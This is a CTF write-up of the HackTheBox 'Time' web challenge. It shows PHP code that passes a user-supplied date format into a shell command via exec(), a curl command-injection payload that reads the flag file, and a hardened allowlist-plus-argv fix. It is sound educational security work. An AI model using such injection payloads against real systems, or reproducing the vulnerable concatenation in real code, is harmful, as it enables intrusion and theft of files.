HackTheBox Business CTF 2021 - Time (Web)


Time is a web challenge from HackTheBox Business CTF 2021. It shows how a user-supplied date format can be used to gain access, and how to read the flag file once we can get the date from the target machine.

First, run the Docker instance and copy the address into the browser.

Let’s download the source code and navigate to TimeController.php.

<?php
class TimeController
{
    public function index($router)
    {
        $format = isset($_GET['format']) ? $_GET['format'] : '%H:%M:%S';
        $time = new TimeModel($format);
        return $router->view('index', ['time' => $time->getTime()]);
    }
}

In the TimeController.php source code we find $format = isset($_GET['format']) ? $_GET['format'] : '%H:%M:%S'; so the format parameter is read directly from the GET request. Next we need to know how to get the flag, so let’s analyze the TimeModel.php code.

<?php
class TimeModel
{
    public function __construct($format)
    {
        $this->command = "date '+" . $format . "' 2>&1";
    }

    public function getTime()
    {
        $time = exec($this->command);
        $res  = isset($time) ? $time : '?';
        return $res;
    }
}

From $this->command = "date '+" . $format . "' 2>&1"; we see that the format is concatenated into a date shell command, which getTime() passes to exec(). That tells us how to execute a command through the target URL.

Let’s try using curl

$ curl 'http://142.93.35.92:30370/?format=%H-%M-%S-%27;$(cat%20../flag)%27'
<html>
<head>
  <meta name='author' content='makelaris, makelarisjr'>
  <meta name='viewport' content='width=device-width, initial-scale=1, shrink-to-fit=no'>
  <title>Time</title>
  <link link='preload' href='//fonts.googleapis.com/css2?family=Press+Start+2P&display=swap' rel='stylesheet'>
  <link rel='stylesheet' href='//maxcdn.bootstrapcdn.com/bootstrap/4.0.0/css/bootstrap.min.css' integrity='sha384-Gn5384xqQ1aoWXA+058RXPxPg6fy4IWvTNh0E263XmFcJlSAwiGgFAW/dAiS6JXm' crossorigin='anonymous'>
  <link rel='icon' href='/assets/favicon.png' />
  <link rel='stylesheet' href='/static/main.css' />
</head>
<body>
  <nav class="navbar navbar-dark bg-primary navbar-expand-lg mb-4">
    <a class="navbar-brand mb-0" href="?format=%H:%M:%S">🕒 What's the time?</a>
    <div class="collapse navbar-collapse" id="navbarSupportedContent">
      <ul class="navbar-nav">
        <li class="nav-item">
          <a class="nav-link" href="?format=%Y-%m-%d">📅 What's the date? <span class="sr-only">(current)</span></a>
        </li>
      </ul>
    </div>
  </nav>
  <div class="jumbotron vertical-center">
    <div class="container">
      <div class="container">
        <h1 class="jumbotron-heading">><span class='text-muted'>It's</span> sh: 1: HTB{tim3_t4lks...4nd_1t_s4ys_1ts_t1m3_t0_PWN!!!}: not found<span class='text-muted'>.</span></h1>
      </div>
    </div>
  </div>
</body>
<script src="https://code.jquery.com/jquery-3.4.1.slim.min.js" integrity="sha384-J6qa4849blE2+poT4WnyKhv5vZF5SrPo0iEjwBvKU7imGFAV0wwj1yYfoRSJoZ+n" crossorigin="anonymous"></script>
<script src="https://cdn.jsdelivr.net/npm/popper.js@1.16.0/dist/umd/popper.min.js" integrity="sha384-Q6E9RHvbIyZFJoft+2mJbHaEWldlvI9IOYy5n3zV9zzTtmI3UksdQRVvoxMfooAo" crossorigin="anonymous"></script>
<script src="https://stackpath.bootstrapcdn.com/bootstrap/4.4.1/js/bootstrap.min.js" integrity="sha384-wfSDF2E50Y2D1uUdj0O3uMBJnjuUD4Ih7YwaYd1iqfktj0Uod8GCExl3Og8ifwB6" crossorigin="anonymous"></script>
</html> 

or

$ curl 'http://142.93.35.92:30370/?format=%H-%M-%S-%27;$(cat%20../flag)%27' | html2text | grep HTB{
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100  1974    0  1974    0     0   1171      0 --:--:--  0:00:01 --:--:--  1171
****** >It's sh: 1: HTB{tim3_t4lks...4nd_1t_s4ys_1ts_t1m3_t0_PWN!!!}: not
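
The root cause is that TimeModel concatenates the format parameter into a shell string for exec(). A hardened stand-in, as an added example that is not the challenge's code: the names SafeTimeModel, ALLOWED and DEFAULT_FORMAT are made up for illustration, and it assumes PHP 7.4 or later with date at /bin/date.

```php
<?php
// Added example, not the challenge's code: a hardened stand-in for TimeModel.
// SafeTimeModel, ALLOWED and DEFAULT_FORMAT are hypothetical names.
class SafeTimeModel
{
    private const DEFAULT_FORMAT = '%H:%M:%S';
    // Allowlist: a few date(1) conversions plus digits and plain separators.
    // Quotes, ';', '$', backticks and parentheses can never match.
    private const ALLOWED = '/\A(?:%[HMSYmdjaAbBZ%]|[0-9 :\/.\-])*\z/';

    private string $format;

    public function __construct(string $format)
    {
        $ok = strlen($format) <= 64 && preg_match(self::ALLOWED, $format) === 1;
        $this->format = $ok ? $format : self::DEFAULT_FORMAT;
    }

    public function getFormat(): string
    {
        return $this->format;
    }

    public function getTime(): string
    {
        // Array form of proc_open (PHP >= 7.4) executes the binary directly:
        // no /bin/sh is involved, so the format is one argv entry, never shell syntax.
        // Assumption: date lives at /bin/date on the host.
        $argv = ['/bin/date', '+' . $this->format];
        $proc = proc_open($argv, [1 => ['pipe', 'w'], 2 => ['pipe', 'w']], $pipes);
        if (!is_resource($proc)) {
            return '?';
        }
        $out = stream_get_contents($pipes[1]);
        fclose($pipes[1]);
        fclose($pipes[2]);
        return proc_close($proc) === 0 ? trim($out) : '?';
    }
}

// Constructed inputs: the default format and the URL-decoded format value from the curl request.
foreach (['%H:%M:%S', "%H-%M-%S-';\$(cat ../flag)'"] as $input) {
    $model = new SafeTimeModel($input);
    printf("%-30s -> format %s -> %s\n", $input, $model->getFormat(), $model->getTime());
}
```

Either control alone closes the injection. Together, the allowlist keeps unexpected input out of date and the argv call removes the shell that interpreted the quote and $( ) in the first place.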
